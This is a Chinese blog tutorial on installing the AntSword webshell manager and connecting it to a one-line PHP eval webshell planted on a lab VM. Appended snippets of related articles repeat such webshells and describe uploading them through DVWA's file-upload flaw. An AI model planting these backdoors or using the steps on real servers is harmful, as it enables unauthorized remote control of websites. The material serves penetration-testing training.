【简单工具】中国蚁剑V2.0下载安装到上手

article/2025/4/29 22:47:04

目录

  • 1 安装及设置
    • 1.1 下载
    • 1.2 安装
    • 1.3 相关设置
  • 2 第一个Shell
    • 2.1 实验环境
    • 2.2 实验步骤
    • 2.3 思考
  • 3 总结
  • 参考文献

1 安装及设置

1.1 下载

  1. 下载蚁剑加载器。在蚁剑官方github下载,网址为https://github.com/AntSwordProject/AntSword-Loader,根据自己系统下载对应版本。
    在这里插入图片描述
  2. 可以不下载源码,选择工作文件时下载器将自动安装最新源码,如果想利用现有源码,则在选择工作文件时选择已有源码目录。

1.2 安装

  1. 本次安装不指定已有源码,让软件直接下载最新版源码,创建一个文件夹,命名为“蚁剑工作目录”。
  2. 解压加载器,在该文件夹中找到安装程序,以管理员身份运行加载器。
    在这里插入图片描述
  3. 点击初始化→选择第一步创建的文件夹→确定。
    在这里插入图片描述
  4. 程序将自动下载安装,过程如下:
    在这里插入图片描述
  5. 待安装过程结束后,再次打开加载器程序,则会打开蚁剑工作界面。
    在这里插入图片描述

1.3 相关设置

在软件界面左上角,根据自己需要可对语言、代理等进行设置。

在这里插入图片描述

2 第一个Shell

2.1 实验环境

  1. 靶机:win2008虚拟机,部署WAMP环境,IP地址为192.168.1.5。
  2. 真实机:win10系统,部署中国蚁剑。

2.2 实验步骤

  1. 在靶机上,启动WAMP环境,在网站根目录下新建一个文件并命名为ant.php,写入语句<?php eval($_POST['ant']); ?>,该语句的解释参考文章《PHP语言常见可注入函数》。
  2. 在真实机上,打开蚁剑软件,在工作界面空白处单击「鼠标右键」,弹出菜单,选择 「添加数据」。
    在这里插入图片描述
  3. 在添加数据页面输入以下参数,其中星标的是必填项,URL是靶机刚刚添加文件的路径,密码是该文件中语句的密码。填写完毕后点击“添加”。
    在这里插入图片描述
  4. 蚁剑界面上将显示刚刚建立的后门。
    在这里插入图片描述
  5. 双击进入,可以看到管理界面就像本机文件管理器一样。
    在这里插入图片描述

2.3 思考

本实验中在靶机下的php文件是我们自己建立的,在不自己建立文件的情况下,如何利用网站已有漏洞进行注入?参考文章《PHP注入漏洞利用实验》

3 总结

  1. 了解蚁剑的安装过程;
  2. 了解蚁剑的功能;
  3. 掌握蚁剑的基本使用方法。

参考文献

  1. 《蚁剑——语雀笔记》

http://chatgpt.dhexx.cn/article/hD4TXZkj.shtml

相关文章

中国蚁剑的下载以及安装教程

一&#xff0c;中国蚁剑下载 唯一官方github下载地址&#xff1a; AntSwordProject GitHub 加载器&#xff1a; GitHub - AntSwordProject/AntSword-Loader: AntSword 加载器 核心源码&#xff1a; GitHub - AntSwordProject/antSword: 中国蚁剑是一款跨平台的开源网站管…

攻防兼备:中国蚁剑使用指南及特征流量

中国蚁剑是菜刀的升级版本&#xff0c;线现下主流的Webshell连接工具之一&#xff0c;有着较广泛的使用&#xff0c;本篇文章会教给大家蚁剑的使用方法以及不同加密方式的流量特征&#xff0c;兼顾攻防两端。 蚁剑下载安装参考&#xff1a;中国蚁剑(antSword)下载、安装、使用…

中国蚁剑下载安装教程

启动中国蚁剑 1 、 下载主程序 文件名&#xff1a;antSword.zip 链接&#xff1a; https://pan.baidu.com/s/1wRmj_cB1sLkJ_npRCYO8Xw 提取码&#xff1a;8888 下载以后解压&#xff0c;比如放在 E:\dev_runApp\security\antsword\antSword-master 如下图所示&#xff1a; …

中国蚁剑下载和安装

既然都听说过中国蚁剑&#xff0c;就不夸啦~~ 下载地址 AntSwordProject GitHub 如果gitup进不去&#xff0c;附上百度网盘连接&#xff1a;链接&#xff1a;https://pan.baidu.com/s/163nL2VXFNQsBmzrpWVcNXQ?pwd6666 提取码&#xff1a;6666 解压后就可以直接打开 运行后…

中国蚁剑 配置使用

1.编写一句话木马&#xff0c;并命名为muma.php 2&#xff0e;利用靶机的文件上传漏洞&#xff0c;将此木马文件&#xff08; Webshell )上传至靶机 1&#xff09;打开dvwa网站 2&#xff09;成功登录DVWA网站后&#xff0c;在网站主页左侧菜单选择 DVWA Security&#xff0c;…

中国蚁剑运用

访问之前创建的dvwa靶场 更改安全等级为low并且提交 写一句话马 <?php eval($_POST[cmd]); ?> 生成文件名为shell.php 上传此文件 显示成功 获得上传路径 打开中国蚁剑 右键空白处选择添加数据 URL地址为之前获得的路径地址 连接密码输入写的shell.php中内容cm…

中国蚁剑(AntSword)安装

安装 首先&#xff0c;蚁剑分为两个部分&#xff0c;一个是核心源码&#xff0c;另一个是加载器&#xff0c;所以我们需要下载源码和加载器 源码&#xff1a;https://github.com/AntSwordProject/antSword/releases/tag/2.1.14加载器&#xff1a;https://github.com/AntSword…

中国蚁剑安装

中国蚁剑安装 一、下载中国蚁剑安装包 1、下载地址&#xff1a; https://github.com/AntSwordProject/ https://github.com/AntSwordProject/AntSword-Loader2、选择版本 二、kali系统下安装步骤 一、上传你所下载的linux 版本的中国蚁剑 1、打开kali终端 找到你上传的中…

中国蚁剑流量分析

中国蚁剑流量分析 文章目录 中国蚁剑流量分析1.代理2.测试连接数据包:执行代码:执行结果: 3.双击连接第一个数据包数据包: 第二个数据包数据包:执行代码:response: 4.打开文件夹数据包: 5.打开文件数据包&#xff1a;执行代码&#xff1a; 6.修改文件1.修改小文件数据包&#x…

中国蚁剑Low

第1步 在DVWA Security里将等级改为Low再点击Submit 第2步在设置里的Advanced的Network的Settings里改为第4个再点击OK 第3步打开抓包工具 第4步到File Upload里 第5步选择文件 第6步点击Upload进行抓包 第7步找到jpg文件将.jpg改为.php 第8步到中国蚁剑里添加数据 第9步目标i…

中国蚁剑安装教程

中国蚁剑&#xff1a; 向中国菜刀致敬&#xff01;中国蚁剑&#xff1a;一款跨平台的开源网站管理工具 github地址&#xff1a; 蚁剑源代码 https://github.com/AntSwordProject 蚁剑加载器 https://github.com/AntSwordProject/AntSword-Loader 云盘下载&#xff1a; h…

中国蚁剑简介

1简单介绍 中国蚁剑和中国菜刀类似&#xff0c;是一款webshell终端管理工具&#xff0c;主要面向合法授权的渗透测试安全人员及常规操作的管理员。 一般结合一句话木马和文件上传使用 一句话木马&#xff1a;在很多的渗透过程中&#xff0c;渗透人员会上传一句话木马&#x…

【蚁剑工具-01】网站管理工具之中国蚁剑安装过程详解以及应用实例

目录 1 中国蚁剑安装及设置1.1 下载1.2 安装1.3 相关设置 2 中国蚁剑应用实例2.1 操作环境2.2 具体步骤 3 总结参考文章 任何人不得将其用于非法用途以及盈利等目的&#xff0c;也禁止未经允许私自修改打包进行发布&#xff0c;否则后果自行承担并将追究其相关责任&#xff01;…

中国蚁剑的工作原理

中国蚁剑连接http://192.168.11.157/dvwa/hackable/uploads/pass.php 蚁剑连接并同时用wireshark抓取流量 1274 行&#xff0c;追踪tcp流 因为我们的php.php内容是 $_POST[pass]&#xff0c;所以这里是post了一个pass参数&#xff0c;后面跟上了命令。通过站长工具-URL解码/编码…

Web安全-AntSword(中国蚁剑)Webshell管理工具使用

为方便您的阅读&#xff0c;可点击下方蓝色字体&#xff0c;进行跳转↓↓↓ 01 工具下载地址02 工具介绍03 使用案例04 参考资料 01 工具下载地址 https://github.com/AntSwordProject/蚂剑工具的下载分为两个部分&#xff0c;一个是项目核心源码antSword&#xff0c;另一个是…

中国蚁剑安装使用教程

中国蚁剑安装使用教程 前言一、中国蚁剑安装二、中国蚁剑使用2.1中国蚁剑连接木马2.2中国蚁剑设置代理2.3中国蚁剑参数设置2.4中国蚁剑其他使用 三、 中国蚁剑绕过Waf3.1 编码绕过WAF3.2插件绕过waf3.3 修改蚁剑绕过WAF 总结 大家好&#xff0c;我是the-back-zoom,如下是中国蚁…

中国蚁剑(AntSword)安装、使用教程

项目地址 加载器&#xff1a; https://github.com/AntSwordProject/AntSword-Loader 核心源码&#xff1a; https://github.com/AntSwordProject/antSword 如果从github上下载很卡&#xff0c;可以去复制链接到githubd上下载 https://githubd.com 中国蚁剑使用说明书&#…

下载、安装和使用网站控制工具——中国蚁剑

下载、安装和使用网站控制工具——中国蚁剑 一&#xff1a;工具的下载 注意&#xff1a;需要下载两个程序&#xff1a;一个是项目核心源码&#xff0c;即主程序-“antSword”&#xff1b;另一个是加载器-“AntSword-Loader”。 主程序的下载 将主程序源码下载之后&#xff0c;…

中国蚁剑AntSword

中国蚁剑AntSword 中国蚁剑是一款开源的跨平台网站管理工具&#xff0c;它主要面向于合法授权的渗透测试安全人员以及进行常规操作的网站管理员。 参考文档 中国蚁剑下载、安装、使用教程_Sumarua的博客-CSDN博客_中国蚁剑怎么使用 中国蚁剑AntSword&#xff1a;开源的跨平台…

Web安全工具—中国蚁剑安装简单使用(持续更新)

Web安全工具—中国蚁剑安装&简单使用 简介&#xff1a; 和中国菜刀一样&#xff0c;同为webshell终端管理工具&#xff0c;不管是中国菜刀还是中国蚁剑&#xff0c;都算的上是很好用webshell终端管理工具。 下载安装地址&#xff1a; https://pan.baidu.com/s/1N8rqyv…